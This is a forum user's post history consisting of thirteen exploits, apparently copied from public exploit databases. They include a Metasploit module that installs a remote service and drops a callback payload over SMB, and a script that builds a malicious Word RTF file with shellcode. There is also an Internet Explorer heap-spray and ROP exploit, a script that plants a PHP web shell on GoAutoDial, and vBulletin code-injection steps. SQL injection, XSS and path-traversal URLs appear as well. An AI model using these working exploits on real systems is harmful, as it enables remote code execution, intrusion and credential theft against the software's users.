Everything posted by HireHackking

  1. # Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability # Date: 2014-10-01 # Exploit Author: Ben Turner # Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/ # Version: 7.9, 8.1, 9.0, 9.1 # Tested on: Windows XP, Windows 7, Server 2003 and Server 2008 # CVE-2015-1497 # CVSS: 10 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::EXE include Msf::Auxiliary::Report # Aliases for common classes SIMPLE = Rex::Proto::SMB::Client XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants def initialize super( 'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability', 'Description' => %Q{ This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. 
}, 'Author' => [ 'Ben Turner' ], 'License' => BSD_LICENSE, 'References' => [ ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'process' }, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Platform' => ['win'], 'Targets' => [ [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'January 10 2014' ) register_options([ OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']), OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']), Opt::RPORT(3465), ], self.class) end def exploit createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\"" createservice << "\x22\x00\x00\x00" startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" startservice << "Nvdkit service start test" startservice << "\x22\x00\x00\x00" removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" removeservice << "Nvdkit service remove test" removeservice << "\x22\x00\x00\x00" def filedrop() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") exe = generate_payload_exe fd = smb_open("\\installservice.exe", 'rwct') fd << exe fd.close self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end 
end def filetest() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") file = "\\installservice.exe" filetest = smb_file_exist?(file) if filetest print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n") else print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!") end self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end begin filedrop() filetest() connect() sock.put(createservice) print_status("Creating the callback payload and installing the remote service") disconnect sleep(5) connect() sock.put(startservice) print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service") disconnect sleep(30) connect sock.put(removeservice) disconnect rescue ::Exception => e print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") abort() end end end
  2. # Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass # Date : 28/02/2015 # Author : R-73eN # Software : Microsoft Office Word 2007 # Tested : Windows 7 Starter import sys # Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode . shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7' #filecontent content="{\\rtf1" content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}" content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par" content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par" content+="{\\object\\objocx" content+="{\\*\\objdata" content+="\n" content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000" content+="00000000000000000E0000" content+="\n" content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000" content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" 
content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000" content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600" content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080" content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974" content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000" content+="000000000000" content+= 'cb818278'# Address=788281CB jmp esp | {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll) content+="9090909090909090" #nops content+= shellcode #junk content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" 
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000" content+="\n" content+="}" content+="}" content+="}" banner = "\n\n" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_|[] /_/ \_\_____|\n\n" print banner if(len(sys.argv) < 2): print '\n Usage : exploit.py filename.rtf' else: filename = sys.argv[1] f=open(filename,"w") f.write(content) f.close() print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'
  3. source: https://www.securityfocus.com/bid/49948/info

     vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

     Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

     vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.

     http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--
     http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--
     http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--
     http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4--
  4. source: https://www.securityfocus.com/bid/49964/info Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. <html> <head> </head> <body> <script type="text/javascript"> <!-- //originally, windows 7 compatible calc.exe shellcode from SkyLined var scode = "removed"; var newstack,newstackaddr; var fakeobj; var spray,spray2,selarray,readindex,readaddr,optarryaddr; var elms = new Array(); var optarray; var mshtmlbase; //option object that is to be corrupted var corruptedoption; var corruptedoptionaddr; var corruptaddr; function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } function inttostr(num) { return String.fromCharCode(num%65536,Math.floor(num/65536)); } function crash() { var o = new Option(); selarray[99].options.add(o,-0x20000000); } function readmem(addr) { if(addr < readaddr) alert("Error, can't read that address"); return strtoint(spray[readindex].substr((addr-readaddr)/2,2)); } function readmem2(addr,size) { if(addr < readaddr) alert("Error, can't read that address"); return spray[readindex].substr((addr-readaddr)/2,size/2); } function overwrite(addr) { try { var index = (addr-optarryaddr)/4 - 0x40000000; selarray[99].options.add(optarray.pop(),index); } catch(err) {} } function getreadaddr() { readaddr = 0; var indexarray = new Array(); var tmpaddr = 0; var i,index; index = readmem(tmpaddr); indexarray.push(index); while(1) { tmpaddr += 0x100000; index = readmem(tmpaddr); for(i=0;i<indexarray.length;i++) { if(indexarray[i]==index+1) { readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24; return 1; } else if(indexarray[i]==index-1) { readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24; return 1; } } indexarray.push(index); } } //leverages the vulnerability into memory disclosure function initread() { //overwrite something in a heap spray 
slide try { selarray[99].options.add(optarray.pop(),-100000000/4); } catch(err) {} //now find what and where exectly did we overwrite readindex = -1; var i; for(i=1;i<200;i++) { if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2)) { readindex = i; break; } } if(readindex == -1) { alert("Error overwriring first spray"); return 0; } var start=2,len=spray[readindex].length-2,mid; while(len>10) { mid = Math.round(len/2); mid = mid - mid%2; if(spray[readindex].substr(start,mid) != spray[readindex-1].substr(start,mid)) { len = mid; } else { start = start+mid; len = len-mid; //if(spray[readindex].substr(start,mid) == spray[readindex-1].substr(start,mid)) alert("error"); } } for(i=start;i<(start+20);i=i+2) { if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) { break; } } //overwrite the string length try { selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1); } catch(err) {} if(spray[readindex].length == spray[readindex-1].length) alert("error overwriting string length"); //readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24; getreadaddr(); optarryaddr = readaddr + 100000000 + i*2; return 1; } function trysploit() { //create some helper objects for(var i =0; i < 100; i++) { elms.push(document.createElement('div')); } //force the option cache to rebuild itself var tmp1 = selarray[99].options[70].text; //overwrite the CTreeNode pointer overwrite(corruptaddr); //read the address of the option object we overwrited with var optadr = readmem(corruptaddr); //delete the option object... 
selarray[99].options.remove(0); CollectGarbage(); //...and allocate some strings in its place for(var i = 0; i < elms.length; i++) { elms[i].className = fakeobj; } //verify we overwrote the deleted option object successfully if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0; alert("success, calc.exe should start once you close this message box"); //now do something with the corrupted option object corruptedoption.parentNode.click(); } function hs() { //first heap spray, nop slide + shellcode spray = new Array(200); var pattern = unescape("%u0C0C%u0C0C"); while(pattern.length<(0x100000/2)) pattern+=pattern; pattern = pattern.substr(0,0x100000/2-0x100); for(var i=0;i<200;i++) { spray[i] = [inttostr(i)+pattern+scode].join(""); } //fill small gaps, we wan everything _behind_ our heap spray so that we can read it var asmall = new Array(10000); pattern = "aaaa"; while(pattern.length<500) pattern+=pattern; for(var i=0;i<10000;i++) { asmall[i]=[pattern+pattern].join(""); } //create some select and option elements selarray = new Array(100); for(var i=0;i<100;i++) { selarray[i] = document.createElement("select"); for(var j=0;j<100;j++) { var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo"); selarray[i].options.add(o,0); } } //create some extra option elements optarray = new Array(10000); for(var i=0;i<10000;i++) { optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo"); } //enable memory disclosure if(initread()==0) return; //force the option cache to rebuild itself var tmp1 = selarray[99].options[60].text; //get the address of some option element to be corrupted, also remove it from its select element, we don't want anything else messing with it corruptedoptionaddr = readmem(optarryaddr+60*4); corruptedoption = selarray[99].options[60]; selarray[99].options.remove(60); //get the base address of mshtml.dll based on the vtable address inside the option object mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0; alert("base address of 
mshtml.dll : " + mshtmlbase.toString(16)); //we'll overwrite the pointer to the CTreeNode object, compute its address corruptaddr = corruptedoptionaddr+0x14; //second heap-spray, this one will act as a stack (we'll exchange stack pointer with a pointer into this) spray2 = new Array(200); //some address that is likely to be inside the "stack" newstackaddr = optarryaddr+100000000; newstackaddr-=newstackaddr%0x1000; newstackaddr+=0x24; //assemble the "stack" so that it calls VirtualProtect on the firs shellcode and then jumps into it through return-oriented-programming newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F); while(newstack.length<(0x1000/2)) 
newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA"); newstack = newstack.substr(0,0x1000/2); while(newstack.length<(0x100000/2)) newstack+=newstack; newstack = newstack.substr(0,0x100000/2-0x100); for(var i=0;i<200;i++) { spray2[i] = [newstack].join(""); } //constract a fake object which will replace a deleted option object (it has to be the same size) //fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); //loop until we either achieve command execution or fail for(var i=0;i<100;i++) { trysploit(); } alert("Exploit failed, try again"); } hs(); --> </script> </body> </html>
  5. source: https://www.securityfocus.com/bid/50001/info

     Active CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

     An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

     Active CMS 1.2.0 is vulnerable; other versions may also be affected.

     http://www.example.com/activecms/admin/admin?action=module&mod='<script>alert(document.cookie)</script>
  6. source: https://www.securityfocus.com/bid/49997/info

     Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability.

     An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users.

     https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip
  7. # Exploit Title: VFU Move Entry Buffer Overflow # Date: 2015-02-25 # Exploit Author: Bas van den Berg -- @barrebas # Vendor Homepage: http://cade.datamax.bg/ # Software Link: http://cade.datamax.bg/vfu/#download # Version: 4.10-1.1 # Tested on: GNU/Linux Kali 1.09 32-bit & Crunchbang 11 Waldorf (based on Debian Wheezy), kernel 3.2.0-4 # VFU 4.10 (probably up to 4.14) contains a buffer overflow when a user # moves a file entry around with a large filename. To trigger this # vulnerability, extensive user interaction is required. # Steps to reproduce the bug: create a file with a large (>115 # characters), run VFU and select 'A' and then 'V' to move the large # file entry around. Upon confirming the entry move, VFU crashes due to # a buffer overflow in this function: ''' void vfu_file_entry_move() { char t[128]; sprintf( t, "MOVE/REORDER File entry: %s", files_list[FLI]->name() ); say1( t ); say2( "Use Up/Down Arrows to reorder, ESC,ENTER when done." ); ''' # This overflow allows execution of arbitrary commands with the # privilege of the current user. The attached PoC demonstrates this. It # drops two files: the large filename and a shellscript that allows # arbitrary command execution. Usage: $ python vfu-move-entry-poc.py import struct import os def p(x): return struct.pack('<L', x & 0xffffffff) with open('./vstring.h', 'w') as f: f.write('#!/bin/sh\ntouch pwned') f.close() os.chmod('./vstring.h', 0755) payload = "A"*115 payload += p(0x8049ca0) # system@plt payload += p(0x804a260) # exit@plt payload += p(0x8088e44) # -> ./vstring.h open(payload, 'w').close()
  8. # Title : GoAutoDial CE 2.0 Shell Upload # Date : 28/02/2015 # Author : R-73eN # Software : GoAutoDial CE 2.0 # Tested : On Linux vicisrv.loc 2.6.18-238.9.1.el5.goPAE #1 GoAutoDial CE 2.0 import socket import sys banner = "\n\n" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner CRLF = "\r\n" def checkvuln(): command = "uname" evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,80)) evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF s.send(evilREQ) a = s.recv(1024) if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Linux") != -1): print '[ + ] Server Is vulnerable [ + ]\n' shellupload() else: print '[ - ] Server is not vulnerable [ - ]\n' s.close() def shellupload(): command = "echo 'Infogen-AL<br><?php echo system($_GET['cmd']);?>' > /var/www/html/infogen.php" #command = "rm /var/www/html/123.pl;rm /var/www/html/TEST.perl" command = command.replace(" ", "%20") evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,80)) evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF s.send(evilREQ) a = s.recv(1024) if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Invalid") 
== -1): print '[ + ] Shell uploaded successfully [ + ]\n' print '[ + ] http://' + host + '/infogen.php [ + ]\n' else: print '[ - ] Shell upload failed.... [ - ]' s.close() if(len(sys.argv) < 4): print '\n Usage : exploit.py 127.0.0.1 /goautodial-agent/ agentuser agentpassword\n' else: host = sys.argv[1] path = sys.argv[2] user = sys.argv[3] password = sys.argv[4] checkvuln() print 'Visit Us : http://infogen.al/'
  9. [+] Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability
     [+] Author: Ibrahim Raafat
     [+] Twitter: https://twitter.com/RaafatSEC
     [+] Plugin: https://wordpress.org/plugins/calculated-fields-form/

     [+] TimeLine
     [-] Feb 6 2015, The vulnerabilities reported
     [-] Feb 7 2015, Response and Confirming the vulnerabilities
     [-] Feb 8 2015, First fixing released to version 1.0.11
     [-] Feb 17 2015, CSRF protection added to version 1.0.12
     [-] March 1 2015, Public Disclosure

     [+] Download: https://downloads.wordpress.org/plugin/calculated-fields-form.1.0.10.zip

     [+] Description:
     There are SQL injection vulnerabilities in the Calculated Fields Form Plugin which could allow the attacker to execute SQL queries in the database.

     [+] Vulnerable Code: [Red]
     https://plugins.trac.wordpress.org/changeset/1084937/calculated-fields-form

     [+] POC:
     /wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and 1=1&name=InsertText
     /wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 or 1=1&name=InsertText // Will update all
     /wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and 1=1
     /wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and 1=2 Delete

     These queries are executed without any CSRF protection. The attacker can use this CSRF vulnerability to execute queries in the SQL database by sending a malicious page to the logged-in admin.

     [+] Impact: An attacker can use these vulnerabilities to update the admin password

     [+] Recommendation: If you are using 1.0.12 or less, upgrade the plugin ASAP

     [+] @lnxg33k Enta Sa3eed Bahlol?
  10. source: https://www.securityfocus.com/bid/50096/info

      The Pretty Link plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

      An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

      Pretty Link Plugin 1.4.56 is vulnerable; other versions may also be affected.

      http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
      http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php?message=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
      http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?prli_blogurl=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
      http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/errors.php?errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
      http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_record=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
  11. #################################################################################################################
      [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
      [+] Discovered By: Dariush Nasirpour (Net.Edit0r)
      [+] My Homepage: black-hg.org / nasirpour.info
      [+] Date: [2015 27 February]
      [+] Vendor Homepage: vBulletin.com
      [+] Tested on: [vBulletin 4.2.2]
      [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my friends ( #bhg )
      #################################################################################################################
      Remote Code Injection:
      +++++++++++++++++++++++++
      1) You Must Register In The vBulletin http://server/register.php example:[blackhat]
      2) go to your user profile example: [http://server/members/blackhat.html]
      3) post something in visitor message and record post data with live http header
         [example] :
         message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
      4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin doesn't let you send the same comment in a time]
         [Now post this with hackbar:]
         URL: http://server/visitormessage.php?do=message
         [Post data]
         message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
         [And referrer data:]
         PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
         [Example referrer data:] > upload downloader.php and s.php
      5- Open hackbar and tamper it with tamper data:
         referrer data has been URL encoded by browser, you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
         and submit request.
      ################################################################################################################
  12. source: https://www.securityfocus.com/bid/50108/info G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability. Remote attackers can exploit these issues to execute arbitrary code in the context of the application or crash the affected application. G-WAN 2.10.6 is vulnerable; other versions may also be affected. while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n'
  13. source: https://www.securityfocus.com/bid/50133/info PROMOTIC is prone to multiple security vulnerabilities. Exploiting these issues may allow remote attackers to execute arbitrary code within the context of the affected application or disclose sensitive information. PROMOTIC 8.1.3 is vulnerable; other versions may also be affected. http://www.example.com/webdir/..\..\..\..\..\boot.ini
